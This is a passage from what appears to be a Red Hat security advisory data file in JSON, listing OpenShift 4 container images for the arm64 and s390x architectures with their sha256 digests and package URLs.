"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3Aa6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773747007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Abdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773429934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Ab8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773174302"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Afa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773699238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773220410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746885"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313364"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Ae88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773173252"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Adbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773215336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773183892"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772768149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773133505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773320537"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Af6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3A01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732947"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773334557"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3Aa3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773739265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Ae9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412958"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350955"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773172418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896602"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772733078"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773280408"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ad24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Ab7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Ad0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773413265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3Af721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3A6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773363720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"product_identification_helper": {
